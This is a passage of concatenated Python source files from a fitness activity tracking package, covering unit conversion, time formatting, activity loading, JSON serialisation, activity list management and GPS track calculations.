if isinstance(value, timedelta):
return times.to_string(value)
if value >= 100:
return as_int(value) + suffix
if value >= 10:
return str(round(value, 1)) + suffix
return str(round(value, 2)) + suffix | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/number_formats.py | number_formats.py |
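# A few illustrative sanity checks of the formatting helpers above (a sketch of
# expected output, not part of the module's public behaviour).
if __name__ == "__main__":
    assert as_int(3.7) == "4"
    assert maybe_as_int(2.0) == "2"
    assert maybe_as_int(2.5) == "2.5"
    assert default_as_string(123.6) == "124"
    assert default_as_string(12.34) == "12.3"
    assert default_as_string(timedelta(minutes=5, seconds=3)) == "5:03"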
import math
from dataclasses import dataclass
from datetime import timedelta
from functools import wraps
from typing import Union
class DimensionError(Exception):
pass
def compatible_dimensions(function):
@wraps(function)
def wrapper(var1, var2, **kwargs):
if var1.dimension != var2.dimension:
raise DimensionError(
f"incompatible dimensions: {var1.dimension} and {var2.dimension}"
)
return function(var1, var2, **kwargs)
return wrapper
@dataclass(frozen=True)
class DimensionValue:
"""A value with a dimension attached."""
value: Union[float, timedelta]
dimension: str
def format(self, unit_system):
return unit_system.format(self.value, self.dimension)
def encode(self, unit_system):
return unit_system.encode(self.value, self.dimension)
@compatible_dimensions
def __lt__(self, other):
return self.value < other.value
@compatible_dimensions
def __gt__(self, other):
return self.value > other.value
@compatible_dimensions
def __eq__(self, other):
return self.value == other.value
@compatible_dimensions
def __ne__(self, other):
return self.value != other.value
@compatible_dimensions
def __le__(self, other):
return self.value <= other.value
@compatible_dimensions
def __ge__(self, other):
return self.value >= other.value
@compatible_dimensions
def __add__(self, other):
return DimensionValue(self.value + other.value, self.dimension)
@compatible_dimensions
def __sub__(self, other):
return DimensionValue(self.value - other.value, self.dimension)
def __neg__(self):
return DimensionValue(-self.value, self.dimension)
@dataclass
class Unit:
name: str
symbol: str
size: float
def encode(self, value):
return value / self.size
def decode(self, value):
return value * self.size
def format(self, value):
return (self.encode(value), self.symbol)
def __truediv__(self, other):
return Unit(
f"{self.name} per {other.name}",
f"{self.symbol} ∕ {other.symbol}",
self.size / other.size,
)
def __mul__(self, other):
return Unit(
f"{self.name} {other.name}",
f"{self.symbol} {other.symbol}",
self.size * other.size,
)
@dataclass
class UnitConfig:
"""The current preferred unit system."""
units: dict
def encode(self, value, dimension):
return self.units[dimension].encode(value)
def decode(self, value, dimension):
return self.units[dimension].decode(value)
def format(self, value, dimension):
return self.units[dimension].format(value)
def format_name_unit(self, dimension, symbol=None, name=None) -> str:
"""
Get 'Distance (m)' or similar string.
Returns the dimension if it isn't recognised.
"""
if symbol is None:
if dimension not in self.units:
return dimension
symbol = self.units[dimension].symbol
if symbol:
return f"{dimension.title() if name is None else name} ({symbol})"
return dimension.title()
class PaceUnit(Unit):
"""A unit of pace (1 / speed), such as 4:00 kilometres."""
def __init__(self, distance: Unit):
self.distance = distance
self.name = f"minutes per {distance.name}"
self.size = 1 / distance.size
self.symbol = "∕ " + distance.symbol
def encode(self, value) -> timedelta:
return timedelta(seconds=super().encode(value))
def __repr__(self):
return f"{self.__class__.__qualname__}({self.distance!r})"
class DateUnit(Unit):
"""A unit giving a date."""
def __init__(self):
super().__init__("date", "", 1)
def encode(self, value):
return value.timestamp()
def format(self, value):
return str(value)
KM = Unit("kilometre", "km", 1000)
MILE = Unit("mile", "mi", 1609.344)
METRE = Unit("metre", "m", 1)
FOOT = Unit("foot", "ft", 0.3048)
YARD = Unit("yard", "yd", 0.9144)
SECOND = Unit("second", "s", 1)
MINUTE = Unit("minute", "min", 60)
HOUR = Unit("hour", "h", 3600)
METRE_PER_SECOND = METRE / SECOND
KM_PER_HOUR = KM / HOUR
MILE_PER_HOUR = MILE / HOUR
MILE_PER_HOUR.symbol = "mph"
FOOT_PER_MINUTE = FOOT / MINUTE
METRE_PER_MINUTE = METRE / MINUTE
TIME = Unit("minutes and seconds", "", 1)
MIN_PER_KM = PaceUnit(KM)
MIN_PER_MILE = PaceUnit(MILE)
BEAT_PER_MINUTE = Unit("beat per minute", "bpm", 1 / 60)
CYCLES_PER_MINUTE = Unit("cycles per minute", "rpm", 1 / 60)
HERTZ = Unit("hertz", "Hz", 1)
WATT = Unit("watt", "W", 1)
HORSE_POWER = Unit("horsepower", "hp", 745.6998715822702)
DEGREE = Unit("degree", "°", math.tau / 360)
RADIAN = Unit("radian", "", 1)
UNITLESS = Unit("", "", 1)
DATE = DateUnit()
ALL = {
"distance": (METRE, FOOT, YARD, KM, MILE),
"altitude": (METRE, FOOT),
"speed": (METRE_PER_SECOND, KM_PER_HOUR, MILE_PER_HOUR, METRE_PER_MINUTE),
"vertical_speed": (METRE_PER_SECOND, METRE_PER_MINUTE, FOOT_PER_MINUTE),
"real_time": (SECOND, MINUTE, HOUR),
"time": (TIME,),
"pace": (MIN_PER_KM, MIN_PER_MILE),
"date": (DATE,),
"heartrate": (BEAT_PER_MINUTE,),
"cadence": (CYCLES_PER_MINUTE,),
"power": (WATT,),
"angle": (DEGREE,),
None: (UNITLESS,),
}
METRIC = {
"distance": KM,
"altitude": METRE,
"speed": KM_PER_HOUR,
"vertical_speed": METRE_PER_MINUTE,
"real_time": MINUTE,
"time": TIME,
"pace": MIN_PER_KM,
"date": DATE,
"heartrate": BEAT_PER_MINUTE,
"cadence": CYCLES_PER_MINUTE,
"power": WATT,
"angle": DEGREE,
None: UNITLESS,
}
IMPERIAL = {
"distance": MILE,
"altitude": FOOT,
"speed": MILE_PER_HOUR,
"vertical_speed": FOOT_PER_MINUTE,
"real_time": MINUTE,
"time": TIME,
"pace": MIN_PER_MILE,
"date": DATE,
"heartrate": BEAT_PER_MINUTE,
"cadence": CYCLES_PER_MINUTE,
"power": HORSE_POWER,
"angle": DEGREE,
None: UNITLESS,
}
DEFAULT = "Metric"
UNIT_SYSTEMS = {"Metric": UnitConfig(METRIC), "Imperial": UnitConfig(IMPERIAL)}
UNIT_NAMES = {
u.name: u
for u in (
KM,
MILE,
METRE,
FOOT,
YARD,
SECOND,
MINUTE,
HOUR,
METRE_PER_SECOND,
KM_PER_HOUR,
MILE_PER_HOUR,
FOOT_PER_MINUTE,
METRE_PER_MINUTE,
TIME,
MIN_PER_KM,
MIN_PER_MILE,
BEAT_PER_MINUTE,
CYCLES_PER_MINUTE,
HERTZ,
WATT,
HORSE_POWER,
DEGREE,
RADIAN,
UNITLESS,
DATE,
)
} | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/units.py | units.py |
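# Illustrative examples of how the unit systems convert raw SI values for
# display (a sketch; the imperial value is rounded only for the comparison).
if __name__ == "__main__":
    metric = UNIT_SYSTEMS["Metric"]
    imperial = UNIT_SYSTEMS["Imperial"]
    assert metric.format(5000, "distance") == (5.0, "km")
    assert metric.format_name_unit("distance") == "Distance (km)"
    assert round(imperial.encode(5000, "distance"), 2) == 3.11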
from datetime import datetime, timedelta
ONE_WEEK = timedelta(days=7)
ONE_DAY = timedelta(days=1)
ONE_HOUR = timedelta(hours=1)
ONE_MINUTE = timedelta(minutes=1)
EPOCH = datetime.fromtimestamp(0) + timedelta(365 * 3 + 1)
MONTHS = (
"January",
"February",
"March",
"April",
"May",
"June",
"July",
"August",
"September",
"October",
"November",
"December",
)
def from_GPX(string):
"""Load a time from a string in GPX format."""
if string is None:
return None
return datetime.fromisoformat(string.rstrip("Z"))
def to_string(time: timedelta, exact=False):
"""Convert a time to a nicely formatted string."""
result = []
started = False
if time.days:
result += [str(time.days), " d "]
time %= ONE_DAY
started = True
if time >= ONE_HOUR or started:
result += [f"{time // ONE_HOUR:0>2d}", ":"]
time %= ONE_HOUR
started = True
if time >= ONE_MINUTE or started:
result += [f"{time // ONE_MINUTE:0>2d}", ":"]
time %= ONE_MINUTE
secs = time.total_seconds()
if int(secs) == secs or not exact:
secs = int(secs)
result.append(f"{secs:0>2d}")
else:
result.append(f"{secs:0>.2f}")
# Only seconds
if len(result) == 1:
result.append(" s")
return "".join(result).lstrip("0").strip()
def nice(time: datetime):
"""Format a time on two lines neatly."""
return time.strftime("%A %d %B %Y\n%H:%M")
def round_time(time: datetime) -> datetime:
"""Round a time to the nearest second."""
new = time - timedelta(microseconds=time.microsecond)
return new + timedelta(seconds=1) if time.microsecond >= 500000 else new
def to_number(value):
"""Convert a timedelta to seconds, leaving other values untouched."""
if isinstance(value, timedelta):
return value.total_seconds()
return value
def back_name(base, period: str, number=0):
"""Get the name of a year, month or week number back."""
if period == "year":
return str(base.year - number)
if period == "month":
return MONTHS[(base.month - number - 1) % 12]
if period == "week":
date = base.date() - number * ONE_WEEK - timedelta(days=base.weekday())
return f"w/c {date:%d %b}"
if period == "day":
return str((base - ONE_DAY * number).day)
if period == "weekday":
return f"{base - ONE_DAY * number:%A}"
raise ValueError('period must be "year", "month" or "week"')
def period_difference(base, other, period: str) -> int:
"""
Determine the number of years/months/weeks between other and base.
Returns 0 if they are in the same week, 1 if other is in the
previous week etc.
"""
if period == "year":
return base.year - other.year
if period == "month":
return base.month - other.month + (base.year - other.year) * 12
if period == "week":
value = (base.date() - other.date()).days // 7
if other.weekday() > base.weekday():
value += 1
return value
if "day" in period:
return (base.date() - other.date()).days
raise ValueError('period must be "year", "month" or "week"')
def since_start(base, period: str) -> timedelta:
"""Return the time since the start of the current period."""
return base - start_of(base, period)
def start_of(base, period: str) -> datetime:
"""Get the start of the current period."""
if period == "year":
return datetime(year=base.year, month=1, day=1)
if period == "month":
return datetime(year=base.year, month=base.month, day=1)
if period == "week":
return (
datetime(year=base.year, month=base.month, day=base.day)
- base.weekday() * ONE_DAY
)
if "day" in period:
return datetime(year=base.year, month=base.month, day=base.day)
raise ValueError('period must be "year", "month", "week" or "day"')
def end_of(base, period: str) -> datetime:
"""Get the end of the current period."""
if period == "year":
return start_of(base.replace(year=base.year + 1), period)
if period == "month":
if base.month == 12:
return start_of(base.replace(year=base.year + 1, month=1), period)
return start_of(base.replace(month=base.month + 1), period)
if period == "week":
return start_of(base + ONE_WEEK, period)
if "day" in period:
return start_of(base + ONE_DAY, period)
raise ValueError('period must be "year", "month" or "week"')
def hours_minutes_seconds(time: timedelta) -> tuple:
hours, seconds = divmod(time.total_seconds(), 3600)
return (hours, *divmod(seconds, 60))
def get_periods(minimum, maximum, period: str) -> list:
"""
Get the periods between minimum and maximum (exclusive).
Returns a list of (end datetime, name) tuples.
"""
current = end_of(minimum, period)
periods = [(current, back_name(current, period, 1))]
while current <= end_of(maximum, period):
current = end_of(current, period)
periods.append((current, back_name(current, period, 1)))
return periods | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/times.py | times.py |
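# Illustrative examples of the helpers above (sanity checks, not a test suite).
if __name__ == "__main__":
    assert to_string(timedelta(seconds=42)) == "42 s"
    assert to_string(timedelta(minutes=5, seconds=3)) == "5:03"
    assert to_string(timedelta(hours=2, minutes=3, seconds=4)) == "2:03:04"
    assert period_difference(datetime(2021, 3, 15), datetime(2021, 1, 10), "month") == 2
    assert hours_minutes_seconds(timedelta(hours=1, minutes=30, seconds=15)) == (1.0, 30.0, 15.0)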
from pathlib import Path
from activate import activity, files, filetypes, track
ACTIVITY_TYPE_NAMES = {
"run": "Run",
"running": "Run",
"ride": "Ride",
"cycling": "Ride",
"biking": "Ride",
"walk": "Walk",
"walking": "Walk",
"hiking": "Walk",
"ski": "Ski",
"alpine_skiing": "Ski",
"swim": "Swim",
"swimming": "Swim",
"row": "Row",
"rowing": "Row",
"1": "Ride",
"2": "Ski",
"9": "Run",
"10": "Walk",
"16": "Swim",
"23": "Row",
}
def convert_activity_type(activity_type: str, name) -> str:
"""Get the correct activity type from a raw one or by inference."""
activity_type = activity_type.casefold()
if activity_type in ACTIVITY_TYPE_NAMES:
return ACTIVITY_TYPE_NAMES[activity_type]
if activity_type in {"unknown", "generic"}:
# Infer activity type from name
for activity_type_name in ACTIVITY_TYPE_NAMES:
if activity_type_name.isnumeric():
continue
if name is not None and activity_type_name in name.casefold():
return ACTIVITY_TYPE_NAMES[activity_type_name]
return "Other"
def default_name(filename: Path):
"""Generate a default activity name from a file name."""
return files.decode_name(filename.stem.split(".")[0])
def load(filename: Path) -> dict:
"""
Get {"name": name, "sport": sport, "track": Track} by loading a file.
Uses the appropriate track loader from the filetypes module.
"""
filetype = (
filename.with_suffix("").suffix
if filename.suffix.casefold() == ".gz"
else filename.suffix
).casefold()
data = {".gpx": filetypes.gpx, ".fit": filetypes.fit, ".tcx": filetypes.tcx}[
filetype
].load(filename)
return {
"name": data[0] if data[0] is not None else default_name(filename),
"sport": convert_activity_type(data[1], data[0]),
"track": track.Track(data[2]),
}
def import_and_load(filename, copy_to) -> activity.Activity:
"""Import an activity and copy it into the originals directory."""
filename = files.copy_to_location_renamed(filename, copy_to)
return activity.from_track(**load(filename), filename=filename) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/load_activity.py | load_activity.py |
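# Illustrative examples of activity-type normalisation (sanity checks only).
if __name__ == "__main__":
    assert convert_activity_type("running", None) == "Run"
    # Generic types fall back to inferring the sport from the activity name.
    assert convert_activity_type("generic", "Morning Run") == "Run"
    assert convert_activity_type("unknown", "Lunch break") == "Other"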
from activate import units
MARATHON = 42195
# The distances shown in the Curve page
SPECIAL_DISTANCES = {
"Run": {
60: "60 m",
100: "100 m",
200: "200 m",
400: "400 m",
500: "500 m",
800: "800 m",
1000: "1000 m",
1500: "1500 m",
units.MILE.decode(1): "1 mile",
2000: "2 km",
3000: "3 km",
units.MILE.decode(2): "2 mile",
5000: "5 km",
units.MILE.decode(5): "5 mile",
10000: "10 km",
15000: "15 km",
units.MILE.decode(10): "10 mile",
20000: "20 km",
MARATHON / 2: "half marathon",
MARATHON: "marathon",
50000: "50 km",
100000: "100 km",
},
"Ride": {
100: "100 m",
200: "200 m",
500: "500 m",
1000: "1 km",
2000: "2 km",
3000: "3 km",
4000: "4 km",
5000: "5 km",
10000: "10 km",
15000: "15 km",
20000: "20 km",
25000: "25 km",
30000: "30 km",
40000: "40 km",
50000: "50 km",
75000: "75 km",
100000: "100 km",
150000: "150 km",
200000: "200 km",
250000: "250 km",
300000: "300 km",
400000: "400 km",
500000: "500 km",
1000000: "1000 km",
},
"Swim": {
25: "25 m",
50: "50 m",
75: "75 m",
100: "100 m",
150: "150 m",
200: "200 m",
300: "300 m",
400: "400 m",
500: "500 m",
800: "800 m",
1000: "1000 m",
1500: "1500 m",
units.MILE.decode(1): "1 mile",
2000: "2 km",
3000: "3 km",
units.MILE.decode(2): "2 mile",
5000: "5 km",
10000: "10 km",
},
"Walk": {
50: "50 m",
100: "100 m",
200: "200 m",
500: "500 m",
1000: "1000 m",
units.MILE.decode(1): "1 mile",
2000: "2 km",
units.MILE.decode(2): "2 mile",
5000: "5 km",
units.MILE.decode(5): "5 mile",
10000: "10 km",
15000: "15 km",
units.MILE.decode(10): "10 mile",
20000: "20 km",
units.MILE.decode(20): "20 mile",
50000: "50 km",
units.MILE.decode(50): "50 mile",
100000: "100 km",
150000: "150 km",
units.MILE.decode(100): "100 mile",
200000: "200 km",
},
None: {
10: "10 m",
20: "20 m",
50: "50 m",
100: "100 m",
200: "200 m",
500: "500 m",
1000: "1 km",
2000: "2 km",
5000: "5 km",
10000: "10 km",
20000: "20 km",
50000: "50 km",
100000: "100 km",
200000: "200 km",
500000: "500 km",
1000000: "1000 km",
},
}
# The boundaries of the zones
ZONES = {
"Run": list(range(21)) + [float("inf")],
"Ride": list(range(0, 62, 2)) + [float("inf")],
"Swim": [x / 2 for x in range(13)] + [float("inf")],
"Walk": [x / 2 for x in range(21)] + [float("inf")],
None: list(range(21)) + [float("inf")],
}
TYPES = ("Run", "Ride", "Swim", "Walk", "Ski", "Row", "Other")
FLAGS = {
"Run": ("Race", "Long Run", "Workout", "Treadmill"),
"Ride": ("Race", "Workout"),
} | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/activity_types.py | activity_types.py |
import gzip
import json
import uuid
from datetime import datetime, timedelta
from pathlib import Path
def default(obj):
"""
Turn datetimes and timedeltas into JSON.
>>> default(datetime(2000, 1, 2, 12, 30, 42))
{'__DATETIME': '2000-01-02T12:30:42'}
>>> default(timedelta(minutes=1, seconds=40))
{'__TIMEDELTA': 100.0}
"""
if isinstance(obj, datetime):
return {"__DATETIME": obj.isoformat()}
if isinstance(obj, timedelta):
return {"__TIMEDELTA": obj.total_seconds()}
if isinstance(obj, uuid.UUID):
return {"__ID": str(obj)}
if isinstance(obj, Path):
return {"__PATH": str(obj)}
raise TypeError(f"Cannot serialise {obj.__class__.__qualname__}")
DECODE_KEYS = {
"__DATETIME": datetime.fromisoformat,
"__TIMEDELTA": lambda v: timedelta(seconds=v),
"__ID": uuid.UUID,
"__PATH": Path,
}
def decode(obj):
"""Undo encoding done by default."""
if len(obj) != 1:
return obj
key, value = obj.popitem()
try:
return DECODE_KEYS[key](value)
except KeyError:
return {key: value}
def dumps(obj, readable=False):
"""Convert an object to a JSON string."""
return json.dumps(
obj,
default=default,
separators=None if readable else (",", ":"),
indent="\t" if readable else None,
)
def dump_bytes(obj, gz=False, readable=False):
"""Convert an object to data."""
data = dumps(obj, readable=readable).encode("utf-8")
return gzip.compress(data) if gz else data
def loads(data, gz=False):
"""Load an object from a string or bytes."""
data = gzip.decompress(data) if gz else data
return json.loads(data, object_hook=decode)
def dump(obj, filename, *args, **kwargs):
"""
Save obj as a JSON file. Can store datetimes and timedeltas.
Can be gzipped if gz is True.
"""
with open(filename, "wb") as f:
f.write(dump_bytes(obj, *args, **kwargs))
def load(filename: Path, gz="auto"):
"""Load a JSON file. Can retrieve datetimes and timedeltas."""
if gz == "auto":
gz = filename.suffix.casefold() == ".gz"
with (gzip.open if gz else open)(filename, "rt") as f:
return json.load(f, object_hook=decode) | Activate-App | /Activate_App-0.0.10-py3-none-any.whl/activate/serialise.py | serialise.py |
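# Illustrative round-trip example of the (de)serialisation helpers above
# (a sketch, not part of the module).
if __name__ == "__main__":
    data = {"when": datetime(2000, 1, 2, 12, 30), "gap": timedelta(seconds=90)}
    assert loads(dump_bytes(data)) == data
    assert loads(dump_bytes(data, gz=True), gz=True) == data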
import dataclasses
import datetime
from collections import Counter
from typing import Optional
from activate import activity, serialise, times, units
LIST_FILENAME = "activity_list.json.gz"
ACTIVITIES_DIR_NAME = "activities"
def from_serial(serial, path):
return ActivityList((UnloadedActivity(**a) for a in serial), path)
def from_disk(path):
"""Load an activity list from disk, if it exists."""
try:
return from_serial(serialise.load(path / LIST_FILENAME), path)
except FileNotFoundError:
return ActivityList([], path)
@dataclasses.dataclass
class UnloadedActivity:
name: str
sport: str
flags: dict
effort_level: Optional[int]
start_time: datetime.datetime
distance: float
duration: float
climb: float
activity_id: str
server: Optional[str] = None
username: Optional[str] = None
def load(self, path) -> activity.Activity:
"""Get the corresponding loaded Activity from disk."""
return activity.Activity(**serialise.load(path / f"{self.activity_id}.json.gz"))
@property
def list_row(self):
result = [
self.name,
self.sport,
self.start_time,
units.DimensionValue(self.distance, "distance"),
]
if self.server is not None:
result = [self.server, self.username] + result
return result
class ActivityList(list):
"""A list of activities, which may be loaded."""
def __init__(self, activities, path=None):
"""Create a list of unloaded activities."""
self._activities = {}
self.path = path
super().__init__(activities)
def by_id(self, activity_id):
try:
return next(a for a in self if a.activity_id == activity_id)
except StopIteration as e:
raise KeyError("No such activity_id") from e
def provide_full_activity(self, activity_id, activity_):
self._activities[activity_id] = activity_
def get_activity(self, activity_id):
"""Get an activity from its activity_id."""
if activity_id not in self._activities:
if self.path is None:
raise ValueError("Cannot load activity")
self.provide_full_activity(
activity_id,
self.by_id(activity_id).load(self.path / ACTIVITIES_DIR_NAME),
)
return self._activities[activity_id]
def serialised(self):
return [dataclasses.asdict(a) for a in self]
def save(self):
"""
Store the activity list in a file.
This only stores the list data, not the actual activities.
"""
serialise.dump(self.serialised(), self.path / LIST_FILENAME, gz=True)
def save_activity(self, activity_id):
self.get_activity(activity_id).save(self.path / ACTIVITIES_DIR_NAME)
def add_activity(self, new_activity):
"""
Add a new activity.
Also saves the activity to disk.
"""
self._activities[new_activity.activity_id] = new_activity
self.append(new_activity.unload(UnloadedActivity))
new_activity.save(self.path / ACTIVITIES_DIR_NAME)
def update(self, activity_id):
"""Regenerate an unloaded activity from its loaded version."""
for i, unloaded_activity in enumerate(self):
if unloaded_activity.activity_id == activity_id:
self[i] = self._activities[activity_id].unload(UnloadedActivity)
break
def remove(self, activity_id):
"""Remove an activity from all parts of the ActivityList."""
# Remove from main list
for a in self:
if a.activity_id == activity_id:
super().remove(a)
# Remove from loaded activities
if activity_id in self._activities:
del self._activities[activity_id]
def filtered(self, activity_types, time_period, now, back=0):
"""
Get an iterable of the matching activities.
The activity types must match activity_types and they must have
taken place in the correct time period. The values for
time_period are "all time", "year", "month" and "week". A value
of zero for back gives this year/month/week, 1 gives the
previous, etc.
"""
time_period = time_period.casefold()
return (
a
for a in self
if a.sport in activity_types
and (
time_period == "all time"
or times.period_difference(now, a.start_time, time_period) == back
)
)
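    # Illustrative usage of filtered (the names below are assumptions used
    # only for demonstration): with an ActivityList ``activities`` and
    # ``now = datetime.datetime.now()``,
    #
    #     last_weeks_runs = list(
    #         activities.filtered({"Running"}, "week", now, back=1)
    #     )
    #
    # gives the unloaded running activities from the previous week.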
def total_distance(self, activities):
return sum(a.distance for a in activities)
def total_time(self, activities):
return sum((a.duration for a in activities), datetime.timedelta())
def total_activities(self, activities):
return sum(1 for _ in activities)
def total_climb(self, activities):
return sum(a.climb for a in activities if a.climb is not None)
def eddington(self, activities, progress=lambda x: x) -> list:
"""Get a list of days sorted by distance done that day."""
return sorted(
sum(
(
Counter(self.get_activity(a.activity_id).track.distance_in_days)
for a in progress(activities)
),
Counter(),
).values(),
reverse=True,
)
def get_progression_data(self, activity_types, time_period, now, key):
"""
Get the activity dates, along with the total at that point.
Filter out the wrong activity_types. Evaluate key for each
activity, and get (dates, totals) in order.
"""
time_period = time_period.casefold()
if time_period == "all time":
data = ([], [])
total = None
valid_sorted = sorted(
self.filtered(activity_types, time_period, now, 0),
key=lambda x: x.start_time,
)
for a in valid_sorted:
value = key(a)
if value is None:
continue
if total is None:
total = value - value
data[0].append(a.start_time)
data[1].append(total)
total += value
data[0].append(a.start_time + a.duration)
data[1].append(total)
if total is not None:
data[0].append(now)
data[1].append(total)
return (None, [data])
# Other time periods
# This is a bit of a hack: all dates are changed to around 1971
# so that DateTimeAxis can eventually handle them
periods = []
result = []
for back in range(5):
start = times.start_of(times.EPOCH, time_period)
data = ([start], [0])
total = None
valid_sorted = sorted(
self.filtered(activity_types, time_period, now, back),
key=lambda x: x.start_time,
)
if not valid_sorted:
continue
for a in valid_sorted:
value = key(a)
if value is None:
continue
if total is None:
total = value - value
data[0].append(start + times.since_start(a.start_time, time_period))
data[1].append(total)
total += value
data[0].append(
start + times.since_start(a.start_time + a.duration, time_period)
)
data[1].append(total)
if back != 0:
data[0].append(times.end_of(times.EPOCH, time_period))
else:
data[0].append(times.EPOCH + times.since_start(now, time_period))
data[1].append(total)
result.append(data)
periods.append(times.back_name(now, time_period, back))
return (periods[::-1], result[::-1])
def get_records(
self, activity_types, time_period, now, distances, progress=lambda x: x
):
records = {}
activity_ids = {}
for activity_ in progress(self.filtered(activity_types, time_period, now, 0)):
for record in self.get_activity(activity_.activity_id).track.get_curve(
distances
)[0]:
if record[0] not in records or records[record[0]][0] > record[1]:
records[record[0]] = record[1:] + (activity_.name,)
activity_ids[record[0]] = activity_.activity_id
return (
[(distance,) + record for distance, record in records.items()],
activity_ids.values(),
)
def get_all_photos(self, activity_types, time_period, now):
return (
p
for a in self.filtered(activity_types, time_period, now)
for p in self.get_activity(a.activity_id).photos
)
def get_all_routes(self, activity_types, time_period, now, progress=lambda x: x):
result = []
for activity_ in progress(self.filtered(activity_types, time_period, now)):
track = self.get_activity(activity_.activity_id).track
if track.has_position_data:
result.append(track.lat_lon_list)
return result
def get_matching(self, activity_, tolerance, progress=lambda x: x):
matching = {activity_.activity_id}
if not activity_.track.has_position_data:
return matching
for other_activity in progress(self):
if other_activity.activity_id == activity_.activity_id or not (
other_activity.sport == activity_.sport
and other_activity.distance / 1.2
< activity_.distance
< other_activity.distance * 1.2
):
continue
if activity_.track.match(
self.get_activity(other_activity.activity_id).track, tolerance
):
matching.add(other_activity.activity_id)
return matching
def __repr__(self):
return (
f"<{self.__class__.__qualname__}"
f" {super().__repr__()}"
f" _activities={self._activities!r}>"
        )


# ----- end of activate/activity_list.py -----
import math
from contextlib import suppress
from dataclasses import asdict, dataclass
from datetime import datetime, timedelta
from functools import lru_cache
from itertools import tee
import bisect
from dtw import dtw
from activate import geometry, times
from activate.units import DimensionValue
SPEED_RANGE = 1
FIELD_DIMENSIONS = {
"lat": "latlon",
"lon": "latlon",
"ele": "altitude",
"height_change": "altitude",
"vertical_speed": "vertical_speed",
"climb": "altitude",
"desc": "altitude",
"gradient": None,
"angle": "angle",
"time": "time",
"speed": "speed",
"dist": "distance",
"dist_to_last": "distance",
"cadence": "cadence",
"heartrate": "heartrate",
"power": "power",
}
NON_SAVED = {"vertical_speed", "climb", "desc", "gradient", "angle"}
def lerp(value1, value2, ratio):
"""
Interpolate between value1 and value2.
lerp(x, y, 0) = x
lerp(x, y, 0.5) = (x + y) / 2
lerp(x, y, 1) = y
"""
return value1 + ratio * (value2 - value1)
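# Illustrative values for lerp (not taken from the original code):
#
#     lerp(10, 20, 0.25)  # 12.5
#     lerp(0.0, 8.0, 1)   # 8.0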
def pairs(iterator):
"""Return pairs of adjacent items."""
firsts, seconds = tee(iterator, 2)
next(seconds)
return zip(firsts, seconds)
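# Illustrative example for pairs (sample data only):
#
#     list(pairs([1, 2, 3]))  # [(1, 2), (2, 3)]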
def infer_nones(data):
"""Infer None values by linear interpolation."""
none_count = 0
last_good = None
for index, value in enumerate(data):
if value is None:
none_count += 1
continue
if none_count:
# Write back interpolated values
gap_size = none_count + 1
for write_back in range(1, gap_size):
# Nones at start
if last_good is None:
data[index - write_back] = value
# Nones in middle
else:
data[index - write_back] = lerp(
value, last_good, write_back / gap_size
)
none_count = 0
last_good = value
if not none_count:
return data
# Nones at end
if last_good is None:
raise ValueError("Cannot interpolate from all Nones")
for write_back in range(none_count + 1):
data[index - write_back] = last_good
return data
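# Illustrative example for infer_nones (sample data only):
#
#     infer_nones([None, 4, None, 8, None])  # [4, 4, 6.0, 8, 8]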
def get_nearby_indices(length, position, number=1) -> range:
"""
Return numbers around position, with at most number either side.
If position is too close to 0 or length, the excess points are
removed.
"""
return range(max(position - number, 0), min(position + number + 1, length))
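# Illustrative examples for get_nearby_indices (sample values only):
#
#     get_nearby_indices(10, 5, number=2)  # range(3, 8)
#     get_nearby_indices(10, 0, number=2)  # range(0, 3)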
try:
from math import dist
except ImportError:
def dist(point1, point2):
return math.sqrt(sum((c1 - c2) ** 2 for c1, c2 in zip(point1, point2)))
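# Illustrative check of the dist fallback (sample points only):
#
#     dist((0, 0, 0), (3, 4, 0))  # 5.0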
def enumerate_from(list_, point):
return enumerate(list_[point:], point)
@dataclass
class ManualTrack:
"""A manual track with a few basic values."""
start_time: datetime
length: float
ascent: float
elapsed_time: timedelta
has_altitude_data = False
has_position_data = False
manual = True
def average(self, field):
if field == "speed":
return self.length / self.elapsed_time.total_seconds()
raise AttributeError(f"{self.__class__.__qualname__} has no average {field}")
@property
def save_data(self):
result = asdict(self)
result["manual"] = True
return result
def __contains__(self, _):
return False
class Track:
"""
A series of GPS points at given times.
A track is considered to be purely a sequence of GPS points, with
extra data for each point. For more metadata such as a name or
description, the Track should be wrapped in an Activity.
Some tracks (those representing pool swims) have no position data.
"""
manual = False
def __init__(self, fields):
self.fields = fields
for essential in ("lat", "lon"):
if essential in self.fields:
with suppress(ValueError):
infer_nones(self[essential])
if "time" in self.fields:
infer_nones(self["time"])
self["ele"] = (
infer_nones(self["ele"])
if self.has_altitude_data
else [0 for _ in range(len(self))]
)
def __getitem__(self, field):
try:
return self.fields[field]
except KeyError:
if field == "dist_to_last":
self.calculate_dist_to_last()
elif field == "dist":
self.calculate_dist()
elif field == "speed":
self.calculate_speed()
elif field in {"climb", "desc"}:
self.calculate_climb_desc()
elif field == "height_change":
self.calculate_height_change()
elif field == "vertical_speed":
self.calculate_vertical_speed()
elif field == "gradient":
self.calculate_gradient()
elif field == "angle":
self.calculate_angle()
return self.fields[field]
def __setitem__(self, field, value):
self.fields[field] = value
def __contains__(self, field):
if field in {"dist_to_last", "dist"}:
return "dist" in self or "dist_to_last" in self or self.has_position_data
if field in {
"climb",
"desc",
"height_change",
"vertical_speed",
"gradient",
"angle",
}:
return self.has_altitude_data
return field in self.fields
@property
@lru_cache(128)
def temporal_resolution(self):
return min(y - x for x, y in pairs(self["time"])).total_seconds()
@property
@lru_cache(128)
def xyz(self):
return [
geometry.to_cartesian(*point)
for point in zip(self["lat"], self["lon"], self["ele"])
]
def calculate_dist_to_last(self):
"""Calculate distances between adjacent points."""
self.fields["dist_to_last"] = [None]
if "dist" in self.fields:
for point in range(1, len(self)):
relevant = self.fields["dist"][point - 1 : point + 1]
self.fields["dist_to_last"].append(
None if None in relevant else relevant[1] - relevant[0]
)
else:
self.fields["dist_to_last"] += [dist(*x) for x in pairs(self.xyz)]
def calculate_climb_desc(self):
self.fields["climb"] = [None]
self.fields["desc"] = [None]
for height_change in self["height_change"][1:]:
# Not using max in order to have integers instead of floats,
# since max(0, 0.0) is 0.0. It's common to have a height
# difference of 0.0 in tracks, because altimeters are not
# very sensitive.
self.fields["climb"].append(0 if height_change <= 0 else height_change)
self.fields["desc"].append(0 if height_change >= 0 else -height_change)
def calculate_dist(self):
"""Calculate cumulative distances."""
total_dist = 0
new_dist = [0]
for dist in self["dist_to_last"][1:]:
total_dist += dist
new_dist.append(total_dist)
self.fields["dist"] = new_dist
